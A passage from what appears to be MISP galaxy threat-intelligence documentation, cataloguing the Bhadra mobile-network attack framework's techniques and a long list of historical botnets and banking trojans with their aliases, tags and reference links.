similar: misp-galaxy:malpedia="CamuBot" with estimative-language:likelihood-probability="likely"

Table 496. Table References
Links
https://www.bleepingcomputer.com/news/security/new-banking-trojan-poses-as-a-security-module/ [https://www.bleepingcomputer.com/news/security/new-banking-trojan-poses-as-a-security-module/ ]

Dark Tequila

Dark Tequila has primarily been designed to steal victims’ financial information from a long list of online banking sites, as well as login credentials to popular websites, ranging from code versioning repositories to public file storage accounts and domain registrars.

The tag is: misp-galaxy:banker="Dark Tequila"

Table 497. Table References
Links
https://thehackernews.com/2018/08/mexico-banking-malware.html

Bhadra Framework

Bhadra Threat Modeling Framework.

Bhadra Framework is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Siddharth Prakash Rao - Silke Holtmanns - Tuomas Aura

Attacks from UE

"Attacks from UE" refers to any technique that involves the attacks launched by the software or hardware components of the user equipment to send malicious traffic into the mobile network.

The tag is: misp-galaxy:bhadra-framework="Attacks from UE"

SIM-based attacks

The "SIM-based attacks" are the techniques that involve any physical smart cards, namely SIM from 2G, USIM from 3G, and UICC from 4G networks.

The tag is: misp-galaxy:bhadra-framework="SIM-based attacks"

Attacks from radio access network

The "attacks from radio access network" are the techniques where an adversary with radio capabilities impersonates the mobile network to the UE (or vice versa) and becomes a man-in-the-middle.

The tag is: misp-galaxy:bhadra-framework="Attacks from radio access network"

Attacks from other mobile network

The "attacks from other mobile networks" and the "attacks with physical access to transport network" techniques can be conducted by evil mobile operators, law enforcement agencies for legal interception and human insiders with access to network nodes

The tag is: misp-galaxy:bhadra-framework="Attacks from other mobile network"

Attacks with access to transport network

The tag is: misp-galaxy:bhadra-framework="Attacks with access to transport network"

Attacks from IP-based network

The "attacks from IP-based attacks" techniques mostly are launched from the service and application network, which allows non operator entities to infuse malicious trac into an operator’s network.

The tag is: misp-galaxy:bhadra-framework="Attacks from IP-based network"

Insider attacks and human errors

The "insider attacks and human errors" technique involve the intentional attacks and unintentional mistakes from human insiders with access to any component of the mobile communication ecosystem.

The tag is: misp-galaxy:bhadra-framework="Insider attacks and human errors"

Infecting UE hardware or software

Retaining the foothold gained on the target system through the initial access by infecting UE hardware or software.

The tag is: misp-galaxy:bhadra-framework="Infecting UE hardware or software"

Infecting SIM cards

Retaining the foothold gained on the target system through the initial access by infecting SIM cards.

The tag is: misp-galaxy:bhadra-framework="Infecting SIM cards"

Spoofed radio network

Retaining the foothold gained on the target system through the initial access by radio network spoofing.

The tag is: misp-galaxy:bhadra-framework="Spoofed radio network"

Infecting network nodes

Retaining the foothold gained on the target system through the initial access by infecting network nodes.

The tag is: misp-galaxy:bhadra-framework="Infecting network nodes"

Covert channels

Retaining the foothold gained on the target system through the initial access via covert channels.

The tag is: misp-galaxy:bhadra-framework="Covert channels"

Port scanning or sweeping

"Port scanning or sweeping" techniques to probe servers or hosts with open ports.

The tag is: misp-galaxy:bhadra-framework="Port scanning or sweeping"

Perimeter mapping

"perimeter mapping" techniques such as command-line utilities (e.g., nmap and whois), web-based lookup tools and official APIs provided by the Internet registrars that assign the ASNs using a wide range of publicly available sources.

The tag is: misp-galaxy:bhadra-framework="Perimeter mapping"

Threat intelligence gathering

"Threat intelligence gathering" using dedicated search engines (such as Censys, Shodan) to gather information about vulnerable devices or networks, or using advanced search options of traditional search engines.

The tag is: misp-galaxy:bhadra-framework="Threat intelligence gathering"

CN-specific scanning

"CN-specific scanning", used to scan nodes that are interconnected with protocols specific to the mobile communication domain (GTP, SCTP).

The tag is: misp-galaxy:bhadra-framework="CN-specific scanning"

Internal resource search

"Internal resource search" refers to an insider with access to provider internal databases abusing the information as a discovery tactic.

The tag is: misp-galaxy:bhadra-framework="Internal resource search"

UE knocking

"UE knocking" refers to the technique that scans User Equipment, similarly to how IP endpoints and core network nodes are scanned or mapped.

The tag is: misp-galaxy:bhadra-framework="UE knocking"

Exploit roaming agreements

"Exploit roaming agreements" is a technique exploited by evil mobile operators. Despite communication with operators is dependent on a roaming agreement being in place, an attacker that has gained a foothold with one operator, it can abuse the roaming agreements in place for lateral movement with all adjacent operators with agreements in place.

The tag is: misp-galaxy:bhadra-framework="Exploit roaming agreements"

Abusing interworking functionalities

"Abusing Inter-working functionalities" is a technique for adversaries to move between networks of different generations laterally

The tag is: misp-galaxy:bhadra-framework="Abusing interworking functionalities"

Exploit platform & service-specific vulnerabilities

Once an attacker has gained a foothold in an operator, it can conduct privilege escalation and process injection for gaining administrative rights, password cracking of valid user accounts on the nodes, exploit vulnerabilities in databases and file systems, and take advantage of improper configurations of routers and switches.

The tag is: misp-galaxy:bhadra-framework="Exploit platform & service-specific vulnerabilities"

SS7-based-attacks

Attacks abusing the SS7 protocol.

The tag is: misp-galaxy:bhadra-framework="SS7-based-attacks"

Diameter-based attacks

Attacks abusing the Diameter protocol.

The tag is: misp-galaxy:bhadra-framework="Diameter-based attacks"

GTP-based attacks

Attacks abusing the GTP protocol.

The tag is: misp-galaxy:bhadra-framework="GTP-based attacks"

DNS-based attacks

DNS based attacks.

The tag is: misp-galaxy:bhadra-framework="DNS-based attacks"

Pre-AKA attacks

Attack techniques that take place during the unencrypted communication that occurs prior to the AKA protocol.

The tag is: misp-galaxy:bhadra-framework="Pre-AKA attacks"

Security audit camouflage

The operating systems, software, and services used on the network nodes are prone to security vulnerabilities and installation of unwanted malware. Although operators conduct routine security audits to track and patch the vulnerabilities or remove the malware from the infected nodes, their effectiveness is not known to the public. Any means by which an adversary can remain undetected from such audits are referred to as the security audit camouflage technique.

The tag is: misp-galaxy:bhadra-framework="Security audit camouflage"

Blacklist evasion

Mobile operators employ several defenses in terms of securing their network traffic. For instance, operators maintain a whitelist of IPs and GTs of nodes from their own infrastructure and their partner operators (as agreed in IR 21), and traffic from only these nodes are processed. Similarly, a blacklist is also maintained to control spam due to configuration errors and malicious traffic. Anything from the blacklist is banned from entering the operator’s network. Such defense mechanisms may defend against unsolicited traffic from external networks (e.g., from the public Internet and SAN), but it barely serves its purpose in the case of attacks from inter-operator communications. Since most of the communication protocols are unauthenticated in nature, an aacker with knowledge of identifiers of the allowed nodes (i.e. gained during the discovery phase) can impersonate their identity. We call it the blacklist evasion technique.

The tag is: misp-galaxy:bhadra-framework="Blacklist evasion"

Middlebox misconfiguration exploits

NAT middleboxes are used for separating private networks of mobile operators from public Internet works as the second line of defense. However, studies have shown that the middleboxes deployed by operators are prone to misconfigurations that allow adversaries to infiltrate malicious traffic into mobile networks e.g., by spoofing the IP headers. Some of the other NAT vulnerabilities lie in IPv4-to-IPv6 address mapping logic, which can be exploited by adversaries to exhaust the resources, wipe out the mapping, or to assist with blacklist evasion. Adversaries use such middlebox misconfiguration exploit techniques to launch denial-of-service or over-billing attacks.

The tag is: misp-galaxy:bhadra-framework="Middlebox misconfiguration exploits"

Bypass Firewall

Adversaries (e.g., evil operators) can for example exploit the implicit trust between roaming partners as a bypass firewall technique.

The tag is: misp-galaxy:bhadra-framework="Bypass Firewall"

Bypass homerouting

SMS home routing is a defense mechanism, where an additional SMS router intervenes in external location queries for SMS deliveries, and the roaming network takes the responsibility of delivering the SMS without providing location information to the external entity. Although many operators have implemented SMS home routing solutions, there are no silver bullets. If the SMS routers are incorrectly configured, adversaries can hide SMS delivery location queries within other messages so that the SMS home router fails to process them. We refer to it as the bypass home routing technique.

The tag is: misp-galaxy:bhadra-framework="Bypass homerouting"

Downgrading

Attacks on the radio access networks are well-studied and newer generations are designed to address the weaknesses in previous generations. Usage of weak cryptographic primitives, lack of integrity protection of the radio channels, and one-sided authentication (only from the network) remain as the problem of mostly GSM only radio communication. So, radio link attackers use downgrading as an attack technique to block service over newer generations and accept to serve only in the GSM radio network. The downgrading technique works similarly in the core network, where the adversary accepts to serve only in SS7-based signaling instead of Diameterbased signaling. Using interworking functions for inter-generation communication translation could make the downgrading attacks much easier.

The tag is: misp-galaxy:bhadra-framework="Downgrading"

Redirection

Redirection technique is a variant of the downgrading technique, where an adversary forcefully routes the traffic through networks or components that are under its control. By redirecting traffic to an unsafe network, the adversary can intercept mobile communication (e.g., calls and SMS) on the RAN part. Redirection attacks on the core network result in not only communication interception, but also in billing discrepancies, as an adversary can route the calls of a mobile user from its home network through a foreign network on a higher call rate.

The tag is: misp-galaxy:bhadra-framework="Redirection"

UE Protection evasion

Protection on the UE is mainly available in the form of antivirus apps as a defense against viruses and malware that steals sensitive information (e.g., banking credentials and user passwords) or track user activities. Simple visual cues on UE (such as notifications) could also be a protection mechanism by itself. Unfortunately, mobile network-based attacks cannot be detected or defended effectively from UE’s side by traditional antivirus apps, and such attacks do not trigger any visual signs. Although there are attempts for defending against radio link attacks, including citywide studies to detect IMSI catchers, their effectiveness is still under debate. Similarly, there are recent attempts to detect signaling attacks using distance bounding protocol run from a UE. However, such solutions are still in the research phase, and their effectiveness on a large scale is still untested. To this end, the absence of robust detection and defense mechanisms on the UE is, in fact, an evasion mechanism for an adversary. We refer to them as UE protection evasion techniques.

The tag is: misp-galaxy:bhadra-framework="UE Protection evasion"

Admin credentials

Stealing legitimate admin credentials for critical nodes is beneficial for the adversary to increase its chances of persistence to the target or masquerade its activities.

The tag is: misp-galaxy:bhadra-framework="Admin credentials"

User-specific identifiers

User-specific identifiers such as IMSI and IMEI are an indicator for who owns UE with a specific subscription and where a UE is located physically. Since mobile users always keep their mobile phones physically near them, an adversary with the knowledge of these permanent identifiers will be able to determine whether or not a user is in a specific location. On the other hand, temporary identifiers (e.g., TMSI and GUTI) are used to reduce the usage of permanent identifiers like IMSI over radio channels. Although the temporary identifiers are supposed to change frequently and expected to live for a short period, research has shown that it is not the case

The tag is: misp-galaxy:bhadra-framework="User-specific identifiers"

User-specific data

Adversaries can collect several types of user-specific data, such as the content of SMS and calls, location dumps from base stations, call and billing records, and browsing-related data (such as DNS queries and unencrypted browsing sessions).

The tag is: misp-galaxy:bhadra-framework="User-specific data"

Network-specific identifiers

Adversaries aim to collect network-specific identifiers such as GTs and IPs of critical nodes and Tunnel Endpoint Identifier (TEID) of GTP tunnels from operators’ networks

The tag is: misp-galaxy:bhadra-framework="Network-specific identifiers"

Network-specific data

Adversaries may also be interested in network-specific data that are obtained mainly during the execution of discovery tactics. Such data includes, e.g., the network topology, the trust relationship between different nodes, routing metadata, and sensitive documents

The tag is: misp-galaxy:bhadra-framework="Network-specific data"

Location tracking

Attacker is able to track the location of the target end-user.

The tag is: misp-galaxy:bhadra-framework="Location tracking"

Calls eavesdropping

Attacker is able to eavesdrop on calls.

The tag is: misp-galaxy:bhadra-framework="Calls eavesdropping"

SMS interception

Attacker is able to intercept SMS messages.

The tag is: misp-galaxy:bhadra-framework="SMS interception"

Data interception

Attacker is able to intercept or modify internet traffic.

The tag is: misp-galaxy:bhadra-framework="Data interception"

Billing frauds

Billing frauds refer to various types of attacks where an adversary causes financial discrepancies for operators.

The tag is: misp-galaxy:bhadra-framework="Billing frauds"

DoS - network

The attacker can create signaling havoc in specific nodes of operators by repeatedly triggering resource allocation or revocation requests.

The tag is: misp-galaxy:bhadra-framework="DoS - network"

DoS - user

The attacker can cause denial of service to mobile users.

The tag is: misp-galaxy:bhadra-framework="DoS - user"

Identity-related attacks

Identity-based attacks involve attack techniques using userand network-specific identifiers. Identity-based attacks cause harm to the privacy of mobile users and produce fraudulent traffic that incurs a financial loss to operators. In most cases, identity-based attacks are used in impersonation, where an adversary impersonates a legitimate mobile user to the core network without possessing appropriate credentials, for example, to avail free mobile services. Most of the signaling attacks that use SS7 are also fall into this category. In other cases, identitybased attacks involve identity mapping, where the adversaries map temporary identifiers (e.g., TMSI and GUTI) to permanent identifiers (e.g., IMSI or MSISDN). In rare cases, the IMSI can further be mapped to social media identities.

The tag is: misp-galaxy:bhadra-framework="Identity-related attacks"

Botnet

botnet galaxy.

Botnet is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Various

ADB.miner

A new botnet appeared over the weekend, and it’s targeting Android devices by scanning for open debug ports so it can infect victims with malware that mines the Monero cryptocurrency.

The botnet came to life on Saturday, February 3, and is targeting port 5555, which on devices running the Android OS is the port used by the operating system’s native Android Debug Bridge (ADB), a debugging interface that grants access to some of the operating system’s most sensitive features.

Only devices running the Android OS have been infected until now, such as smartphones, smart TVs, and TV top boxes, according to security researchers from Qihoo 360’s Network Security Research Lab [Netlab] division, the ones who discovered the botnet, which the named ADB.miner.

The tag is: misp-galaxy:botnet="ADB.miner"

Table 498. Table References
Links
https://www.bleepingcomputer.com/news/security/android-devices-targeted-by-new-monero-mining-botnet/

Bagle

Bagle (also known as Beagle) was a mass-mailing computer worm affecting Microsoft Windows. The first strain, Bagle.A, did not propagate widely. A second variant, Bagle.B, was considerably more virulent.

The tag is: misp-galaxy:botnet="Bagle"

Bagle is also known as:

Beagle
Mitglieder
Lodeight

View relationships graph

Bagle has relationships with:

similar: misp-galaxy:malpedia="Bagle" with estimative-language:likelihood-probability="likely"

Table 499. Table References
Links
https://en.wikipedia.org/wiki/Bagle_(computer_worm)

Marina Botnet

Around the same time Bagle was sending spam messages all over the world, the Marina Botnet quickly made a name for itself. With over 6 million bots pumping out spam emails every single day, it became apparent these “hacker tools” could get out of hand very quickly. At its peak, Marina Botnet delivered 92 billion spam emails per day.

The tag is: misp-galaxy:botnet="Marina Botnet"

Marina Botnet is also known as:

Damon Briant
BOB.dc
Cotmonger
Hacktool.Spammer
Kraken

View relationships graph

Marina Botnet has relationships with:

similar: misp-galaxy:botnet="Kraken" with estimative-language:likelihood-probability="likely"

Table 500. Table References
Links
https://en.wikipedia.org/wiki/Botnet

Torpig

Torpig, also known as Anserin or Sinowal is a type of botnet spread through systems compromised by the Mebroot rootkit by a variety of trojan horses for the purpose of collecting sensitive personal and corporate data such as bank account and credit card information. It targets computers that use Microsoft Windows, recruiting a network of zombies for the botnet. Torpig circumvents antivirus software through the use of rootkit technology and scans the infected system for credentials, accounts and passwords as well as potentially allowing attackers full access to the computer. It is also purportedly capable of modifying data hajimeon the computer, and can perform man-in-the-browser attacks.

The tag is: misp-galaxy:botnet="Torpig"

Torpig is also known as:

Sinowal
Anserin

View relationships graph

Torpig has relationships with:

similar: misp-galaxy:malpedia="Sinowal" with estimative-language:likelihood-probability="likely"

Table 501. Table References
Links
https://en.wikipedia.org/wiki/Torpig

Storm

The Storm botnet or Storm worm botnet (also known as Dorf botnet and Ecard malware) is a remotely controlled network of "zombie" computers (or "botnet") that have been linked by the Storm Worm, a Trojan horse spread through e-mail spam. At its height in September 2007, the Storm botnet was running on anywhere from 1 million to 50 million computer systems, and accounted for 8% of all malware on Microsoft Windows computers. It was first identified around January 2007, having been distributed by email with subjects such as "230 dead as storm batters Europe," giving it its well-known name. The botnet began to decline in late 2007, and by mid-2008, had been reduced to infecting about 85,000 computers, far less than it had infected a year earlier.

The tag is: misp-galaxy:botnet="Storm"

Storm is also known as:

Nuwar
Peacomm
Zhelatin
Dorf
Ecard

Table 502. Table References
Links
https://en.wikipedia.org/wiki/Storm_botnet

Rustock

The tag is: misp-galaxy:botnet="Rustock"

Rustock is also known as:

RKRustok
Costrat

View relationships graph

Rustock has relationships with:

similar: misp-galaxy:malpedia="Rustock" with estimative-language:likelihood-probability="likely"

Table 503. Table References
Links
https://en.wikipedia.org/wiki/Rustock_botnet

Donbot

The tag is: misp-galaxy:botnet="Donbot"

Donbot is also known as:

Buzus
Bachsoy

View relationships graph

Donbot has relationships with:

similar: misp-galaxy:malpedia="Buzus" with estimative-language:likelihood-probability="likely"

Table 504. Table References
Links
https://en.wikipedia.org/wiki/Donbot_botnet

Cutwail

The Cutwail botnet, founded around 2007, is a botnet mostly involved in sending spam e-mails. The bot is typically installed on infected machines by a Trojan component called Pushdo.] It affects computers running Microsoft Windows. related to: Wigon, Pushdo

The tag is: misp-galaxy:botnet="Cutwail"

Cutwail is also known as:

Pandex
Mutant

View relationships graph

Cutwail has relationships with:

similar: misp-galaxy:malpedia="Cutwail" with estimative-language:likelihood-probability="likely"

Table 505. Table References
Links
https://en.wikipedia.org/wiki/Cutwail_botnet

Akbot

Akbot was a computer virus that infected an estimated 1.3 million computers and added them to a botnet.

The tag is: misp-galaxy:botnet="Akbot"

View relationships graph

Akbot has relationships with:

similar: misp-galaxy:tool="Akbot" with estimative-language:likelihood-probability="likely"

Table 506. Table References
Links
https://en.wikipedia.org/wiki/Akbot

Srizbi

Srizbi BotNet, considered one of the world’s largest botnets, and responsible for sending out more than half of all the spam being sent by all the major botnets combined. The botnets consist of computers infected by the Srizbi trojan, which sent spam on command. Srizbi suffered a massive setback in November 2008 when hosting provider Janka Cartel was taken down; global spam volumes reduced up to 93% as a result of this action.

The tag is: misp-galaxy:botnet="Srizbi"

Srizbi is also known as:

Cbeplay
Exchanger

Table 507. Table References
Links
https://en.wikipedia.org/wiki/Srizbi_botnet

Lethic

The Lethic Botnet (initially discovered around 2008) is a botnet consisting of an estimated 210 000 - 310 000 individual machines which are mainly involved in pharmaceutical and replica spam. At the peak of its existence the botnet was responsible for 8-10% of all the spam sent worldwide.

The tag is: misp-galaxy:botnet="Lethic"

View relationships graph

Lethic has relationships with:

similar: misp-galaxy:malpedia="Lethic" with estimative-language:likelihood-probability="likely"

Table 508. Table References
Links
https://en.wikipedia.org/wiki/Lethic_botnet

Xarvester

The tag is: misp-galaxy:botnet="Xarvester"

Xarvester is also known as:

Rlsloup
Pixoliz

Table 509. Table References
Links
https://krebsonsecurity.com/tag/xarvester/

Sality

Sality is the classification for a family of malicious software (malware), which infects files on Microsoft Windows systems. Sality was first discovered in 2003 and has advanced over the years to become a dynamic, enduring and full-featured form of malicious code. Systems infected with Sality may communicate over a peer-to-peer (P2P) network for the purpose of relaying spam, proxying of communications, exfiltrating sensitive data, compromising web servers and/or coordinating distributed computing tasks for the purpose of processing intensive tasks (e.g. password cracking). Since 2010, certain variants of Sality have also incorporated the use of rootkit functions as part of an ongoing evolution of the malware family. Because of its continued development and capabilities, Sality is considered to be one of the most complex and formidable forms of malware to date.

The tag is: misp-galaxy:botnet="Sality"

Sality is also known as:

Sector
Kuku
Sality
SalLoad
Kookoo
SaliCode
Kukacka

View relationships graph

Sality has relationships with:

similar: misp-galaxy:malpedia="Sality" with estimative-language:likelihood-probability="likely"

Table 510. Table References
Links
https://en.wikipedia.org/wiki/Sality

Mariposa

The Mariposa botnet, discovered December 2008, is a botnet mainly involved in cyberscamming and denial-of-service attacks. Before the botnet itself was dismantled on 23 December 2009, it consisted of up to 12 million unique IP addresses or up to 1 million individual zombie computers infected with the "Butterfly (mariposa in Spanish) Bot", making it one of the largest known botnets.

The tag is: misp-galaxy:botnet="Mariposa"

Table 511. Table References
Links
https://en.wikipedia.org/wiki/Mariposa_botnet

Conficker

Conficker, also known as Downup, Downadup and Kido, is a computer worm targeting the Microsoft Windows operating system that was first detected in November 2008. It uses flaws in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet, and has been unusually difficult to counter because of its combined use of many advanced malware techniques. The Conficker worm infected millions of computers including government, business and home computers in over 190 countries, making it the largest known computer worm infection since the 2003 Welchia.

The tag is: misp-galaxy:botnet="Conficker"

Conficker is also known as:

DownUp
DownAndUp
DownAdUp
Kido

View relationships graph

Conficker has relationships with:

similar: misp-galaxy:malpedia="Conficker" with estimative-language:likelihood-probability="likely"

Table 512. Table References
Links
https://en.wikipedia.org/wiki/Conficker

Waledac

Waledac, also known by its aliases Waled and Waledpak, was a botnet mostly involved in e-mail spam and malware. In March 2010 the botnet was taken down by Microsoft.

The tag is: misp-galaxy:botnet="Waledac"

Waledac is also known as:

Waled
Waledpak

Table 513. Table References
Links
https://en.wikipedia.org/wiki/Waledac_botnet

Maazben

A new botnet, dubbed Maazben, has also been observed and is also growing rapidly. MessageLabs Intelligence has been tracking the growth of Maazben since its infancy in late May and early June. Its dominance in terms of the proportion of spam has been accelerating in the last 30 days from just over 0.5% of all spam, peaking at 4.5% of spam when it is most active. Currently spam from Maazben accounts for approximately 1.4% of all spam, but this is likely to increase significantly over time, particularly since both overall spam per minute sent and spam per bot per minute are increasing.

The tag is: misp-galaxy:botnet="Maazben"

Table 514. Table References
Links
https://www.symantec.com/connect/blogs/evaluating-botnet-capacity

Onewordsub

The tag is: misp-galaxy:botnet="Onewordsub"

Table 515. Table References
Links
https://www.botnets.fr/wiki/OneWordSub

Gheg

Tofsee, also known as Gheg, is another botnet analyzed by CERT Polska. Its main job is to send spam, but it is able to do other tasks as well. It is possible thanks to the modular design of this malware – it consists of the main binary (the one user downloads and infects with), which later downloads several additional modules from the C2 server – they modify code by overwriting some of the called functions with their own. An example of some actions these modules perform is spreading by posting click-bait messages on Facebook and VKontakte (Russian social network).

The tag is: misp-galaxy:botnet="Gheg"

Gheg is also known as:

Tofsee
Mondera

View relationships graph

Gheg has relationships with:

similar: misp-galaxy:malpedia="Tofsee" with estimative-language:likelihood-probability="likely"

Table 516. Table References
Links
https://www.cert.pl/en/news/single/tofsee-en/

Nucrypt

The tag is: misp-galaxy:botnet="Nucrypt"

Table 517. Table References
Links
https://www.botnets.fr/wiki.old/index.php?title=Nucrypt&setlang=en

Wopla

The tag is: misp-galaxy:botnet="Wopla"

Table 518. Table References
Links
https://www.botnets.fr/wiki.old/index.php/Wopla

Asprox

The Asprox botnet (discovered around 2008), also known by its aliases Badsrc and Aseljo, is a botnet mostly involved in phishing scams and performing SQL injections into websites in order to spread malware.

The tag is: misp-galaxy:botnet="Asprox"

Asprox is also known as:

Badsrc
Aseljo
Danmec
Hydraflux

View relationships graph

Asprox has relationships with:

similar: misp-galaxy:malpedia="Asprox" with estimative-language:likelihood-probability="likely"

Table 519. Table References
Links
https://en.wikipedia.org/wiki/Asprox_botnet

Spamthru

Spam Thru represented an expontential jump in the level of sophistication and complexity of these botnets, harnessing a 70,000 strong peer to peer botnet seeded with the Spam Thru Trojan. Spam Thru is also known by the Aliases Backdoor.Win32.Agent.uu, Spam-DComServ and Troj_Agent.Bor. Spam Thru was unique because it had its own antivirus engine designed to remove any other malicious programs residing in the same infected host machine so that it can get unlimited access to the machine’s processing power as well as bandwidth. It also had the potential to be 10 times more productive than most other botnets while evading detection because of in-built defences.

The tag is: misp-galaxy:botnet="Spamthru"

Spamthru is also known as:

Spam-DComServ
Covesmer
Xmiler

Table 520. Table References
Links
http://www.root777.com/security/analysis-of-spam-thru-botnet/

Gumblar

Gumblar is a malicious JavaScript trojan horse file that redirects a user’s Google searches, and then installs rogue security software. Also known as Troj/JSRedir-R this botnet first appeared in 2009.

The tag is: misp-galaxy:botnet="Gumblar"

Table 521. Table References
Links
https://en.wikipedia.org/wiki/Gumblar

BredoLab

The Bredolab botnet, also known by its alias Oficla, was a Russian botnet mostly involved in viral e-mail spam. Before the botnet was eventually dismantled in November 2010 through the seizure of its command and control servers, it was estimated to consist of millions of zombie computers.

The tag is: misp-galaxy:botnet="BredoLab"

BredoLab is also known as:

Oficla

View relationships graph

BredoLab has relationships with:

similar: misp-galaxy:tool="Oficla" with estimative-language:likelihood-probability="likely"

Table 522. Table References
Links
https://en.wikipedia.org/wiki/Bredolab_botnet

Grum

The Grum botnet, also known by its alias Tedroo and Reddyb, was a botnet mostly involved in sending pharmaceutical spam e-mails. Once the world’s largest botnet, Grum can be traced back to as early as 2008. At the time of its shutdown in July 2012, Grum was reportedly the world’s 3rd largest botnet, responsible for 18% of worldwide spam traffic.

The tag is: misp-galaxy:botnet="Grum"

Grum is also known as:

Tedroo
Reddyb

Table 523. Table References
Links
https://en.wikipedia.org/wiki/Grum_botnet

Mega-D

The Mega-D, also known by its alias of Ozdok, is a botnet that at its peak was responsible for sending 32% of spam worldwide.

The tag is: misp-galaxy:botnet="Mega-D"

Mega-D is also known as:

Ozdok

Table 524. Table References
Links
https://en.wikipedia.org/wiki/Mega-D_botnet

Kraken

The Kraken botnet was the world’s largest botnet as of April 2008. Researchers say that Kraken infected machines in at least 50 of the Fortune 500 companies and grew to over 400,000 bots. It was estimated to send 9 billion spam messages per day. Kraken botnet malware may have been designed to evade anti-virus software, and employed techniques to stymie conventional anti-virus software.

The tag is: misp-galaxy:botnet="Kraken"

Kraken is also known as:

Kracken

View relationships graph

Kraken has relationships with:

similar: misp-galaxy:botnet="Marina Botnet" with estimative-language:likelihood-probability="likely"

Table 525. Table References
Links
https://en.wikipedia.org/wiki/Kraken_botnet

Festi

The Festi botnet, also known by its alias of Spamnost, is a botnet mostly involved in email spam and denial of service attacks.

The tag is: misp-galaxy:botnet="Festi"

Festi is also known as:

Spamnost

Table 526. Table References
Links
https://en.wikipedia.org/wiki/Festi_botnet

Vulcanbot

Vulcanbot is the name of a botnet predominantly spread in Vietnam, apparently with political motives. It is thought to have begun in late 2009.

The tag is: misp-galaxy:botnet="Vulcanbot"

Table 527. Table References
Links
https://en.wikipedia.org/wiki/Vulcanbot

LowSec

The tag is: misp-galaxy:botnet="LowSec"

LowSec is also known as:

LowSecurity
FreeMoney
Ring0.Tools

TDL4

Alureon (also known as TDSS or TDL-4) is a trojan and bootkit created to steal data by intercepting a system’s network traffic and searching for: banking usernames and passwords, credit card data, PayPal information, social security numbers, and other sensitive user data. Following a series of customer complaints, Microsoft determined that Alureon caused a wave of BSoDs on some 32-bit Microsoft Windows systems. The update, MS10-015,triggered these crashes by breaking assumptions made by the malware author(s).

The tag is: misp-galaxy:botnet="TDL4"

TDL4 is also known as:

TDSS
Alureon

View relationships graph

TDL4 has relationships with:

similar: misp-galaxy:malpedia="Alureon" with estimative-language:likelihood-probability="likely"

Table 528. Table References
Links
https://en.wikipedia.org/wiki/Alureon#TDL-4

Zeus

Zeus, ZeuS, or Zbot is a Trojan horse malware package that runs on versions of Microsoft Windows. While it can be used to carry out many malicious and criminal tasks, it is often used to steal banking information by man-in-the-browser keystroke logging and form grabbing. It is also used to install the CryptoLocker ransomware. Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009 security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and BusinessWeek. Similarly to Koobface, Zeus has also been used to trick victims of tech support scams into giving the scam artists money through pop-up messages that claim the user has a virus, when in reality they might have no viruses at all. The scammers may use programs such as Command prompt or Event viewer to make the user believe that their computer is infected.

The tag is: misp-galaxy:botnet="Zeus"

Zeus is also known as:

Zbot
ZeuS
PRG
Wsnpoem
Gorhax
Kneber

View relationships graph

Zeus has relationships with:

similar: misp-galaxy:tool="Zeus" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:banker="Zeus" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Zeus" with estimative-language:likelihood-probability="likely"

Table 529. Table References
Links
https://en.wikipedia.org/wiki/Zeus_(malware)

Kelihos

The Kelihos botnet, also known as Hlux, is a botnet mainly involved in spamming and the theft of bitcoins.

The tag is: misp-galaxy:botnet="Kelihos"

Kelihos is also known as:

Hlux

View relationships graph

Kelihos has relationships with:

similar: misp-galaxy:malpedia="Kelihos" with estimative-language:likelihood-probability="likely"

Table 530. Table References
Links
https://en.wikipedia.org/wiki/Kelihos_botnet

Ramnit

Ramnit is a Computer worm affecting Windows users. It was estimated that it infected 800 000 Windows PCs between September and December 2011. The Ramnit botnet was dismantled by Europol and Symantec securities in 2015. In 2015, this infection was estimated at 3 200 000 PCs.

The tag is: misp-galaxy:botnet="Ramnit"

View relationships graph

Ramnit has relationships with:

similar: misp-galaxy:banker="Ramnit" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Ramnit" with estimative-language:likelihood-probability="likely"

Table 531. Table References
Links
https://en.wikipedia.org/wiki/Botnet

Zer0n3t

The tag is: misp-galaxy:botnet="Zer0n3t"

Zer0n3t is also known as:

Fib3rl0g1c
Zer0n3t
Zer0Log1x

Chameleon

The Chameleon botnet is a botnet that was discovered on February 28, 2013 by the security research firm, spider.io. It involved the infection of more than 120,000 computers and generated, on average, 6 million US dollars per month from advertising traffic. This traffic was generated on infected systems and looked to advertising parties as regular end users which browsed the Web, because of which it was seen as legitimate web traffic. The affected computers were all Windows PCs with the majority being private PCs (residential systems).

The tag is: misp-galaxy:botnet="Chameleon"

Table 532. Table References
Links
https://en.wikipedia.org/wiki/Chameleon_botnet

Mirai

Mirai (Japanese for "the future", 未来) is a malware that turns networked devices running Linux into remotely controlled "bots" that can be used as part of a botnet in large-scale network attacks. It primarily targets online consumer devices such as IP cameras and home routers. The Mirai botnet was first found in August 2016 by MalwareMustDie, a whitehat malware research group, and has been used in some of the largest and most disruptive distributed denial of service (DDoS) attacks, including an attack on 20 September 2016 on computer security journalist Brian Krebs’s web site, an attack on French web host OVH, and the October 2016 Dyn cyberattack.

The tag is: misp-galaxy:botnet="Mirai"

View relationships graph

Mirai has relationships with:

similar: misp-galaxy:tool="Mirai" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Mirai (ELF)" with estimative-language:likelihood-probability="likely"
variant-of: misp-galaxy:botnet="Owari" with estimative-language:likelihood-probability="likely"
variant-of: misp-galaxy:botnet="Sora" with estimative-language:likelihood-probability="likely"

Table 533. Table References
Links
https://en.wikipedia.org/wiki/Mirai_(malware)
https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/
https://www.bleepingcomputer.com/news/security/mirai-iot-malware-uses-aboriginal-linux-to-target-multiple-platforms/
https://www.bleepingcomputer.com/news/security/new-mirai-variant-comes-with-27-exploits-targets-enterprise-devices/

XorDDoS

XOR DDOS is a Linux trojan used to perform large-scale DDoS

The tag is: misp-galaxy:botnet="XorDDoS"

Table 534. Table References
Links
https://en.wikipedia.org/wiki/Xor_DDoS

Satori

